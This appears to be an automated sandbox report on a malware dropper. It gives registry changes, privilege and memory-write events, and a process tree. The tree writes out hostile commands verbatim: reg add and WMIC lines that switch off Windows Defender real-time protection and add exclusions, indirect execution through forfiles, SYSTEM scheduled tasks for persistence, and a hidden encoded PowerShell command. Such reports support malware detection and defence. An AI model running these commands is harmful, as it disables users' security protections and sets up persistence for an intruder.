\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-8d-6a-62-f9-8c\WpadDecision = "0" gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My gLYDEcB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0d6c13975f7da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ gLYDEcB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{169C2FCC-CF88-4F10-BAB6-B3C11DB09B6F} gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs gLYDEcB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f019b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs gLYDEcB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{169C2FCC-CF88-4F10-BAB6-B3C11DB09B6F}\WpadNetworkName = "Network 3" gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs gLYDEcB.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2860 schtasks.exe 1784 schtasks.exe 2980 schtasks.exe 3024 schtasks.exe 1860 schtasks.exe 1932 schtasks.exe 448 schtasks.exe 2188 schtasks.exe 2672 schtasks.exe 2404 schtasks.exe 1972 schtasks.exe 1980 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2304 powershell.exe 2304 powershell.exe 2304 powershell.exe 3036 powershell.exe 1520 powershell.exe 1520 powershell.exe 1520 powershell.exe 2396 powershell.EXE 2396 powershell.EXE 2396 powershell.EXE 2276 powershell.EXE 2276 powershell.EXE 2276 powershell.EXE 1356 powershell.exe 1628 powershell.EXE 1628 powershell.EXE 1628 powershell.EXE 2136 powershell.exe 2136 powershell.exe 2136 powershell.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 2088 powershell.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 2204 powershell.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe 612 gLYDEcB.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 3036 powershell.exe Token: SeIncreaseQuotaPrivilege 3004 WMIC.exe Token: SeSecurityPrivilege 3004 WMIC.exe Token: SeTakeOwnershipPrivilege 3004 WMIC.exe Token: SeLoadDriverPrivilege 3004 WMIC.exe Token: SeSystemProfilePrivilege 3004 WMIC.exe Token: SeSystemtimePrivilege 3004 WMIC.exe Token: SeProfSingleProcessPrivilege 3004 WMIC.exe Token: SeIncBasePriorityPrivilege 3004 WMIC.exe Token: SeCreatePagefilePrivilege 3004 WMIC.exe Token: SeBackupPrivilege 3004 WMIC.exe Token: SeRestorePrivilege 3004 WMIC.exe Token: SeShutdownPrivilege 3004 WMIC.exe Token: SeDebugPrivilege 3004 WMIC.exe Token: SeSystemEnvironmentPrivilege 3004 WMIC.exe Token: SeRemoteShutdownPrivilege 3004 WMIC.exe Token: SeUndockPrivilege 3004 WMIC.exe Token: SeManageVolumePrivilege 3004 WMIC.exe Token: 33 3004 WMIC.exe Token: 34 3004 WMIC.exe Token: 35 3004 WMIC.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 2396 powershell.EXE Token: SeDebugPrivilege 2276 powershell.EXE Token: SeDebugPrivilege 1356 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2728 WMIC.exe Token: SeIncreaseQuotaPrivilege 2728 WMIC.exe Token: SeSecurityPrivilege 2728 WMIC.exe Token: SeTakeOwnershipPrivilege 2728 WMIC.exe Token: SeLoadDriverPrivilege 2728 WMIC.exe Token: SeSystemtimePrivilege 2728 WMIC.exe Token: SeBackupPrivilege 2728 WMIC.exe Token: SeRestorePrivilege 2728 WMIC.exe Token: SeShutdownPrivilege 2728 WMIC.exe Token: SeSystemEnvironmentPrivilege 2728 WMIC.exe Token: SeUndockPrivilege 2728 WMIC.exe Token: SeManageVolumePrivilege 2728 WMIC.exe Token: SeDebugPrivilege 1628 powershell.EXE Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1276 WMIC.exe Token: SeIncreaseQuotaPrivilege 1276 WMIC.exe Token: SeSecurityPrivilege 1276 WMIC.exe Token: SeTakeOwnershipPrivilege 1276 WMIC.exe Token: SeLoadDriverPrivilege 1276 WMIC.exe Token: SeSystemtimePrivilege 1276 WMIC.exe Token: SeBackupPrivilege 1276 WMIC.exe Token: SeRestorePrivilege 1276 WMIC.exe Token: SeShutdownPrivilege 1276 WMIC.exe Token: SeSystemEnvironmentPrivilege 1276 WMIC.exe Token: SeUndockPrivilege 1276 WMIC.exe Token: SeManageVolumePrivilege 1276 WMIC.exe Token: SeDebugPrivilege 2204 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2216 WMIC.exe Token: SeIncreaseQuotaPrivilege 2216 WMIC.exe Token: SeSecurityPrivilege 2216 WMIC.exe Token: SeTakeOwnershipPrivilege 2216 WMIC.exe Token: SeLoadDriverPrivilege 2216 WMIC.exe Token: SeSystemtimePrivilege 2216 WMIC.exe Token: SeBackupPrivilege 2216 WMIC.exe Token: SeRestorePrivilege 2216 WMIC.exe Token: SeShutdownPrivilege 2216 WMIC.exe Token: SeSystemEnvironmentPrivilege 2216 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30 PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30 PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30 PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30 PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30 PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30 PID 3040 wrote to memory of 2312 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 30 PID 2312 wrote to memory of 2116 2312 Install.exe 31 PID 2312 wrote to memory of 2116 2312 Install.exe 31 PID 2312 wrote to memory of 2116 2312 Install.exe 31 PID 2312 wrote to memory of 2116 2312 Install.exe 31 PID 2312 wrote to memory of 2116 2312 Install.exe 31 PID 2312 wrote to memory of 2116 2312 Install.exe 31 PID 2312 wrote to memory of 2116 2312 Install.exe 31 PID 2116 wrote to memory of 2072 2116 Install.exe 32 PID 2116 wrote to memory of 2072 2116 Install.exe 32 PID 2116 wrote to memory of 2072 2116 Install.exe 32 PID 2116 wrote to memory of 2072 2116 Install.exe 32 PID 2116 wrote to memory of 2072 2116 Install.exe 32 PID 2116 wrote to memory of 2072 2116 Install.exe 32 PID 2116 wrote to memory of 2072 2116 Install.exe 32 PID 2072 wrote to memory of 2288 2072 cmd.exe 34 PID 2072 wrote to memory of 2288 2072 cmd.exe 34 PID 2072 wrote to memory of 2288 2072 cmd.exe 34 PID 2072 wrote to memory of 2288 2072 cmd.exe 34 PID 2072 wrote to memory of 2288 2072 cmd.exe 34 PID 2072 wrote to memory of 2288 2072 cmd.exe 34 PID 2072 wrote to memory of 2288 2072 cmd.exe 34 PID 2288 wrote to memory of 2184 2288 forfiles.exe 35 PID 2288 wrote to memory of 2184 2288 forfiles.exe 35 PID 2288 wrote to memory of 2184 2288 forfiles.exe 35 PID 2288 wrote to memory of 2184 2288 forfiles.exe 35 PID 2288 wrote to memory of 2184 2288 forfiles.exe 35 PID 2288 wrote to memory of 2184 2288 forfiles.exe 35 PID 2288 wrote to memory of 2184 2288 forfiles.exe 35 PID 2184 wrote to memory of 2460 2184 cmd.exe 36 PID 2184 wrote to memory of 2460 2184 cmd.exe 36 PID 2184 wrote to memory of 2460 2184 cmd.exe 36 PID 2184 wrote to memory of 2460 2184 cmd.exe 36 PID 2184 wrote to memory of 2460 2184 cmd.exe 36 PID 2184 wrote to memory of 2460 2184 cmd.exe 36 PID 2184 wrote to memory of 2460 2184 cmd.exe 36 PID 2072 wrote to memory of 2720 2072 cmd.exe 37 PID 2072 wrote to memory of 2720 2072 cmd.exe 37 PID 2072 wrote to memory of 2720 2072 cmd.exe 37 PID 2072 wrote to memory of 2720 2072 cmd.exe 37 PID 2072 wrote to memory of 2720 2072 cmd.exe 37 PID 2072 wrote to memory of 2720 2072 cmd.exe 37 PID 2072 wrote to memory of 2720 2072 cmd.exe 37 PID 2720 wrote to memory of 2716 2720 forfiles.exe 38 PID 2720 wrote to memory of 2716 2720 forfiles.exe 38 PID 2720 wrote to memory of 2716 2720 forfiles.exe 38 PID 2720 wrote to memory of 2716 2720 forfiles.exe 38 PID 2720 wrote to memory of 2716 2720 forfiles.exe 38 PID 2720 wrote to memory of 2716 2720 forfiles.exe 38 PID 2720 wrote to memory of 2716 2720 forfiles.exe 38 PID 2716 wrote to memory of 2752 2716 cmd.exe 39 PID 2716 wrote to memory of 2752 2716 cmd.exe 39 PID 2716 wrote to memory of 2752 2716 cmd.exe 39 PID 2716 wrote to memory of 2752 2716 cmd.exe 39 PID 2716 wrote to memory of 2752 2716 cmd.exe 39 PID 2716 wrote to memory of 2752 2716 cmd.exe 39 PID 2716 wrote to memory of 2752 2716 cmd.exe 39 PID 2072 wrote to memory of 2760 2072 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe"C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe.\Install.exe /ldidp "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2184 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2460
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
- System Location Discovery: System Language Discovery
PID:2752
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2816
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
- System Location Discovery: System Language Discovery
PID:2820
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:2848 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:3068
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
- Indirect Command Execution
PID:2764 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2740
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2608
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Indirect Command Execution
PID:2700 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:3016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWNXgrRlacKgnUwPKK" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe\" Hi /gdpdidfiz 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 6764⤵
- Loads dropped DLL
- Program crash
PID:1720
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3B30062D-F970-4E37-9734-8D823D3745AA} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exeC:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe Hi /gdpdidfiz 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- System Location Discovery: System Language Discovery
PID:1792 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:496 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:448
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:1136
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2092 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1648
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:320
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1696 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1944 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:948
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1392 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:944
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:1088
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
PID:2572 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1764
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
- System Location Discovery: System Language Discovery
PID:2096
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCsdWAqEI" /SC once /ST 00:16:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCsdWAqEI"3⤵PID:2140
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCsdWAqEI"3⤵PID:2904
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2756 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2852
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcpmSykxt" /SC once /ST 02:28:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcpmSykxt"3⤵PID:2204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcpmSykxt"3⤵
- System Location Discovery: System Language Discovery
PID:1352
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:768 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
- System Location Discovery: System Language Discovery
PID:1536 -
